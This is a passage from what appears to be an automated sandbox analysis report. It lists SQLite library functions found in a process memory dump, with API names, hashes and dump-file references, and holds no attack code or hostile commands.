                                                                                                  • Associated: 0000000B.00000002.649417599.0000000061E96000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649422165.0000000061E98000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649430077.0000000061EAA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649434745.0000000061EAB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649439374.0000000061EAE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649444348.0000000061EB1000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649448904.0000000061EB2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_11_2_61e00000_convert.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: sqlite3_str_append$sqlite3_str_appendall
                                                                                                  • String ID: <expr>$rowid
                                                                                                  • API String ID: 851024535-2606092651
                                                                                                  • Opcode ID: 4d31edcbe2cd69ac9767798eac5b3aa218a2de775f6837a28b47fca173f6ffa0
                                                                                                  • Instruction ID: 3f44b9961fe872e3890dc8435bf9f45010e5b58887dcd78829793586ea9ca391
                                                                                                  • Opcode Fuzzy Hash: 4d31edcbe2cd69ac9767798eac5b3aa218a2de775f6837a28b47fca173f6ffa0
                                                                                                  • Instruction Fuzzy Hash: 694156B49087059BCB04DF69C5D169EBBE0BB88748F24CD2DE8994B390D776D8818F42
                                                                                                  Function 61E1E6FC Relevance: 16.9, APIs: 3, Strings: 8, Instructions: 358stringCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000B.00000002.649402082.0000000061E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 61E00000, based on PE: true
                                                                                                  • Associated: 0000000B.00000002.649397390.0000000061E00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649417599.0000000061E96000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649422165.0000000061E98000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649430077.0000000061EAA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649434745.0000000061EAB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649439374.0000000061EAE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649444348.0000000061EB1000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649448904.0000000061EB2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_11_2_61e00000_convert.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: strncmp
                                                                                                  • String ID: -$-$0$]$false$null$true$}
                                                                                                  • API String ID: 1114863663-1443276563
                                                                                                  • Opcode ID: 6bdbc10b6e08e433de89a79e71cf95decf08c0e9f742c35de295bfcd7d61d190
                                                                                                  • Instruction ID: bc763faa6251271fa7e5d496301736fcb2434da925db5e29f4af3b085ec4c853
                                                                                                  • Opcode Fuzzy Hash: 6bdbc10b6e08e433de89a79e71cf95decf08c0e9f742c35de295bfcd7d61d190
                                                                                                  • Instruction Fuzzy Hash: FED1E670A0CA468EE713CFAAC442799BBF2BF05318F6CC55AE4A197B89C339D446C751
                                                                                                  Function 61E0C3B9 Relevance: 16.6, APIs: 11, Instructions: 54COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000B.00000002.649402082.0000000061E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 61E00000, based on PE: true
                                                                                                  • Associated: 0000000B.00000002.649397390.0000000061E00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649417599.0000000061E96000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649422165.0000000061E98000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649430077.0000000061EAA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649434745.0000000061EAB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649439374.0000000061EAE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649444348.0000000061EB1000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649448904.0000000061EB2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_11_2_61e00000_convert.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: sqlite3_free
                                                                                                  • String ID:
                                                                                                  • API String ID: 2313487548-0
                                                                                                  • Opcode ID: f0b11a29783efd7e7c8c14ce528e1fd951f247dcb29d9c1997e282895af9f18b
                                                                                                  • Instruction ID: 755c6084426158ed5d91e3566ae4d0f48e8097a4fdfb5aec262eee5d34d220ca
                                                                                                  • Opcode Fuzzy Hash: f0b11a29783efd7e7c8c14ce528e1fd951f247dcb29d9c1997e282895af9f18b
                                                                                                  • Instruction Fuzzy Hash: 5E119DB4A587418BCB80AF78C0C4519FBE5EF88315B52889DDC88CF305D775D8A1CB91
                                                                                                  Function 61E754CD Relevance: 15.1, APIs: 10, Instructions: 121COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • sqlite3_malloc64.SQLITE3 ref: 61E75544
                                                                                                  • sqlite3_exec.SQLITE3 ref: 61E75577
                                                                                                  • sqlite3_free_table.SQLITE3 ref: 61E75591
                                                                                                  • sqlite3_free.SQLITE3 ref: 61E755A5
                                                                                                  • sqlite3_mprintf.SQLITE3 ref: 61E755B8
                                                                                                  • sqlite3_free.SQLITE3 ref: 61E755C5
                                                                                                  • sqlite3_free.SQLITE3 ref: 61E755DE
                                                                                                    • Part of subcall function 61E09DA3: sqlite3_mutex_enter.SQLITE3 ref: 61E09DC2
                                                                                                  • sqlite3_free_table.SQLITE3 ref: 61E755F3
                                                                                                    • Part of subcall function 61E09F67: sqlite3_free.SQLITE3 ref: 61E09F95
                                                                                                  • sqlite3_realloc64.SQLITE3 ref: 61E75617
                                                                                                  • sqlite3_free_table.SQLITE3 ref: 61E75629
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000B.00000002.649402082.0000000061E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 61E00000, based on PE: true
                                                                                                  • Associated: 0000000B.00000002.649397390.0000000061E00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649417599.0000000061E96000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649422165.0000000061E98000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649430077.0000000061EAA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649434745.0000000061EAB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649439374.0000000061EAE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649444348.0000000061EB1000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649448904.0000000061EB2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_11_2_61e00000_convert.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: sqlite3_free$sqlite3_free_table$sqlite3_execsqlite3_malloc64sqlite3_mprintfsqlite3_mutex_entersqlite3_realloc64
                                                                                                  • String ID:
                                                                                                  • API String ID: 3621699333-0
                                                                                                  • Opcode ID: 681b439c2df7b0fcd8d82009647d213dd0f0d3c9cff520648b60e1d3e1acdd1c
                                                                                                  • Instruction ID: fd9f83ecbe410c01a313c88d75176e8e9b49f4ab152912af1e288474d7920152
                                                                                                  • Opcode Fuzzy Hash: 681b439c2df7b0fcd8d82009647d213dd0f0d3c9cff520648b60e1d3e1acdd1c
                                                                                                  • Instruction Fuzzy Hash: 7F51B2B49053499BEB10DFA8D584B9EBBF1FF84308F208429E854AB340D779E850CF91
                                                                                                  Function 61E1A6CA Relevance: 13.9, APIs: 9, Instructions: 399COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000B.00000002.649402082.0000000061E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 61E00000, based on PE: true
                                                                                                  • Associated: 0000000B.00000002.649397390.0000000061E00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649417599.0000000061E96000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649422165.0000000061E98000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649430077.0000000061EAA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649434745.0000000061EAB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649439374.0000000061EAE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649444348.0000000061EB1000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649448904.0000000061EB2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_11_2_61e00000_convert.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: sqlite3_freesqlite3_malloc
                                                                                                  • String ID:
                                                                                                  • API String ID: 423083942-0
                                                                                                  • Opcode ID: e5e8ed34cfa1df38ea00753311fa879d79d8548ec2877f36c65d0a78c8bc2532
                                                                                                  • Instruction ID: 774842dca3a7b23ba9098b7aaa30b2ff1ec5719cad4ff7753127fd75edc15362
                                                                                                  • Opcode Fuzzy Hash: e5e8ed34cfa1df38ea00753311fa879d79d8548ec2877f36c65d0a78c8bc2532
                                                                                                  • Instruction Fuzzy Hash: A202E974A49289CFDB04CFA8C581AADBBF2BF88314F258559D815AB329D730E845CF90
                                                                                                  Function 61E271D7 Relevance: 13.8, APIs: 9, Instructions: 341COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • sqlite3_value_text.SQLITE3 ref: 61E271F6
                                                                                                  • sqlite3_result_error_toobig.SQLITE3 ref: 61E272D7
                                                                                                  • sqlite3_result_error_nomem.SQLITE3 ref: 61E272FD
                                                                                                  • sqlite3_snprintf.SQLITE3 ref: 61E27579
                                                                                                  • sqlite3_snprintf.SQLITE3 ref: 61E275A6
                                                                                                  • sqlite3_snprintf.SQLITE3 ref: 61E275B0
                                                                                                  • sqlite3_snprintf.SQLITE3 ref: 61E27616
                                                                                                  • sqlite3_result_text.SQLITE3 ref: 61E27739
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000B.00000002.649402082.0000000061E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 61E00000, based on PE: true
                                                                                                  • Associated: 0000000B.00000002.649397390.0000000061E00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649417599.0000000061E96000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649422165.0000000061E98000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649430077.0000000061EAA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649434745.0000000061EAB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649439374.0000000061EAE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649444348.0000000061EB1000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649448904.0000000061EB2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_11_2_61e00000_convert.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: sqlite3_snprintf$sqlite3_result_error_nomemsqlite3_result_error_toobigsqlite3_result_textsqlite3_value_text
                                                                                                  • String ID:
                                                                                                  • API String ID: 2444656285-0
                                                                                                  • Opcode ID: 13c9f4abfe8d5cebd01134be04a38e19ab0229d85707aec9553534cb700e836b
                                                                                                  • Instruction ID: 5994e3254eeef7e10fce3f09ece7705fa91c434df33f790ca7c769dd0499c4de
                                                                                                  • Opcode Fuzzy Hash: 13c9f4abfe8d5cebd01134be04a38e19ab0229d85707aec9553534cb700e836b
                                                                                                  • Instruction Fuzzy Hash: 85E19FB5D4835ACFDB208F58C8A0799BBF0BF56318F25C899D898A7344D734D9828F42
                                                                                                  Function 61E279A4 Relevance: 13.7, APIs: 9, Instructions: 168COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000B.00000002.649402082.0000000061E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 61E00000, based on PE: true
                                                                                                  • Associated: 0000000B.00000002.649397390.0000000061E00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649417599.0000000061E96000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649422165.0000000061E98000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649430077.0000000061EAA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649434745.0000000061EAB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649439374.0000000061EAE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649444348.0000000061EB1000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649448904.0000000061EB2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_11_2_61e00000_convert.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: sqlite3_snprintf$sqlite3_result_textsqlite3_result_value
                                                                                                  • String ID:
                                                                                                  • API String ID: 336169149-0
                                                                                                  • Opcode ID: 46ebdda8d4aef807e37125267e542ff61a555965f328b42af6b305b9235a9ac5
                                                                                                  • Instruction ID: b2bec1aa2aa06a88faab86db98da8f06bc74788f178ef6d3e6112113e51fb7b9
                                                                                                  • Opcode Fuzzy Hash: 46ebdda8d4aef807e37125267e542ff61a555965f328b42af6b305b9235a9ac5
                                                                                                  • Instruction Fuzzy Hash: 3561F3B0A083868FD7019F68C8A079ABFE2AF95318F28C95CD4C98B395D735C845CB42
                                                                                                  Function 61E269CE Relevance: 13.6, APIs: 9, Instructions: 126COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000B.00000002.649402082.0000000061E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 61E00000, based on PE: true
                                                                                                  • Associated: 0000000B.00000002.649397390.0000000061E00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649417599.0000000061E96000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649422165.0000000061E98000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649430077.0000000061EAA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649434745.0000000061EAB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649439374.0000000061EAE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649444348.0000000061EB1000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649448904.0000000061EB2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_11_2_61e00000_convert.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: sqlite3_get_auxdata$memcmpsqlite3_freesqlite3_mallocsqlite3_result_error_nomemsqlite3_set_auxdatasqlite3_value_bytessqlite3_value_text
                                                                                                  • String ID:
                                                                                                  • API String ID: 1733351873-0
                                                                                                  • Opcode ID: 27ba6a7ff9bc66825ba48da0b545964acf9c2ae77fe968f884774e85edb77aa2
                                                                                                  • Instruction ID: de325be661a98a2f84987773780815510347e568cddbbcc963d86352d16293be
                                                                                                  • Opcode Fuzzy Hash: 27ba6a7ff9bc66825ba48da0b545964acf9c2ae77fe968f884774e85edb77aa2
                                                                                                  • Instruction Fuzzy Hash: 8851E4B0E042598FCB40DFA9C49069EBBF1AF4D314F24C66AD855EB304E735D8528F51
                                                                                                  Function 61E35690 Relevance: 12.6, APIs: 6, Strings: 1, Instructions: 366COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000B.00000002.649402082.0000000061E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 61E00000, based on PE: true
                                                                                                  • Associated: 0000000B.00000002.649397390.0000000061E00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649417599.0000000061E96000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649422165.0000000061E98000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649430077.0000000061EAA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649434745.0000000061EAB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649439374.0000000061EAE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649444348.0000000061EB1000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649448904.0000000061EB2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_11_2_61e00000_convert.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: memcmp$sqlite3_free$sqlite3_malloc64
                                                                                                  • String ID: 0
                                                                                                  • API String ID: 3361124181-4108050209
                                                                                                  • Opcode ID: c89378d471feb7345ba14a29a8fca3d24c9a6ed8e935f74fc64e46c615daa88c
                                                                                                  • Instruction ID: 8c9dc45c2d26cc3314bdd5abb124e39ffa3e8b68e4d3cb32c5b43cabb391bd20
                                                                                                  • Opcode Fuzzy Hash: c89378d471feb7345ba14a29a8fca3d24c9a6ed8e935f74fc64e46c615daa88c
                                                                                                  • Instruction Fuzzy Hash: 65E13070A043698FDB11CFA8C88079DBBF1AF89318F65856AD859AB345E734D886CF41
                                                                                                  Function 61E7C585 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 115COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • sqlite3_step.SQLITE3(?,?,?,?,?,?,?,00000004,?,?,61E7CECA), ref: 61E7C5C4
                                                                                                  • sqlite3_finalize.SQLITE3 ref: 61E7C644
                                                                                                  • sqlite3_finalize.SQLITE3 ref: 61E7C693
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000B.00000002.649402082.0000000061E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 61E00000, based on PE: true
                                                                                                  • Associated: 0000000B.00000002.649397390.0000000061E00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649417599.0000000061E96000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649422165.0000000061E98000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649430077.0000000061EAA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649434745.0000000061EAB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649439374.0000000061EAE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649444348.0000000061EB1000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649448904.0000000061EB2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_11_2_61e00000_convert.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: sqlite3_finalize$sqlite3_step
                                                                                                  • String ID: integer$null$real
                                                                                                  • API String ID: 2395141310-2769304496
                                                                                                  • Opcode ID: c160f6475af13f3792a7955bae019c26f1b04d2c9282ef96144353d39dab8bea
                                                                                                  • Instruction ID: ab73cd4464e232efc6068817c2dbb65267d58ddef041d78221729ecbe3c31867
                                                                                                  • Opcode Fuzzy Hash: c160f6475af13f3792a7955bae019c26f1b04d2c9282ef96144353d39dab8bea
                                                                                                  • Instruction Fuzzy Hash: 4A51E7B0A047568FDB14DFA9C480A5ABBF5BF88714F25C96DD848AB315D378E840CBA1
                                                                                                  Function 61E90790 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 109filememoryCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000B.00000002.649402082.0000000061E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 61E00000, based on PE: true
                                                                                                  • Associated: 0000000B.00000002.649397390.0000000061E00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649417599.0000000061E96000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649422165.0000000061E98000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649430077.0000000061EAA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649434745.0000000061EAB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649439374.0000000061EAE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649444348.0000000061EB1000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649448904.0000000061EB2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_11_2_61e00000_convert.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Virtual$ProtectQueryabortfwritevfprintf
                                                                                                  • String ID: @
                                                                                                  • API String ID: 1503958624-2766056989
                                                                                                  • Opcode ID: 807b495b28b03be4d396e31a65b89b58737f7bdecfd5b861c2b8b39ba3db2c54
                                                                                                  • Instruction ID: a0de617ab0917094f34eb4f8007555d36275dea332b47e3c0db7e93c06bb4240
                                                                                                  • Opcode Fuzzy Hash: 807b495b28b03be4d396e31a65b89b58737f7bdecfd5b861c2b8b39ba3db2c54
                                                                                                  • Instruction Fuzzy Hash: F14112B5A147419FEB10DF68C58461ABBE4BF85364F94C91CE899DB350E730E8848B92
                                                                                                  Function 61E8ED96 Relevance: 12.3, APIs: 8, Instructions: 258COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000B.00000002.649402082.0000000061E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 61E00000, based on PE: true
                                                                                                  • Associated: 0000000B.00000002.649397390.0000000061E00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649417599.0000000061E96000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649422165.0000000061E98000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649430077.0000000061EAA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649434745.0000000061EAB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649439374.0000000061EAE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649444348.0000000061EB1000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649448904.0000000061EB2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_11_2_61e00000_convert.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: sqlite3_freesqlite3_mutex_entersqlite3_randomness$sqlite3_malloc64sqlite3_mutex_leave
                                                                                                  • String ID:
                                                                                                  • API String ID: 1657278834-0
                                                                                                  • Opcode ID: fbedb8660bbb0ad3e57053b1680335ed9b12db248aad2de5f595c345e39a6b3a
                                                                                                  • Instruction ID: 780649902df650684f158bb957af1da0b66518050d94f8a49ce11094842617fc
                                                                                                  • Opcode Fuzzy Hash: fbedb8660bbb0ad3e57053b1680335ed9b12db248aad2de5f595c345e39a6b3a
                                                                                                  • Instruction Fuzzy Hash: 45B16875A0564A8FCF40CFA9D48069DB7F1FF8A314F28C429E828AB345D778E945CB50
                                                                                                  Function 61E61CF1 Relevance: 12.2, APIs: 8, Instructions: 215COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                    • Part of subcall function 61E2ABED: sqlite3_log.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 61E2AC31
                                                                                                  • sqlite3_mutex_enter.SQLITE3 ref: 61E61D3A
                                                                                                  • sqlite3_prepare_v2.SQLITE3 ref: 61E61D78
                                                                                                  • sqlite3_step.SQLITE3 ref: 61E61DCD
                                                                                                  • sqlite3_errmsg.SQLITE3 ref: 61E61F6A
                                                                                                    • Part of subcall function 61E27C83: sqlite3_log.SQLITE3 ref: 61E27CAC
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000B.00000002.649402082.0000000061E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 61E00000, based on PE: true
                                                                                                  • Associated: 0000000B.00000002.649397390.0000000061E00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649417599.0000000061E96000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649422165.0000000061E98000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649430077.0000000061EAA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649434745.0000000061EAB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649439374.0000000061EAE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649444348.0000000061EB1000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649448904.0000000061EB2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_11_2_61e00000_convert.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: sqlite3_log$sqlite3_errmsgsqlite3_mutex_entersqlite3_prepare_v2sqlite3_step
                                                                                                  • String ID:
                                                                                                  • API String ID: 154587148-0
                                                                                                  • Opcode ID: 70d14fd3d2e8eb9be4cf7663d6139740a904a0fbed048c508a162cbdbf9578b4
                                                                                                  • Instruction ID: f26c7ee43f3adffec19d40859398e03c1db5ac104f24a00d7dd95a3f76694606
                                                                                                  • Opcode Fuzzy Hash: 70d14fd3d2e8eb9be4cf7663d6139740a904a0fbed048c508a162cbdbf9578b4
                                                                                                  • Instruction Fuzzy Hash: 0B8107B0E4524A8BDB01DFE9C98079EBBF9AFD9308F64C429E854E7350D738D8418B91
                                                                                                  Function 61E26478 Relevance: 10.7, APIs: 7, Instructions: 177COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000B.00000002.649402082.0000000061E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 61E00000, based on PE: true
                                                                                                  • Associated: 0000000B.00000002.649397390.0000000061E00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649417599.0000000061E96000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649422165.0000000061E98000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649430077.0000000061EAA000.00000004.00000001.01000000.00000007.sdmpDownload File
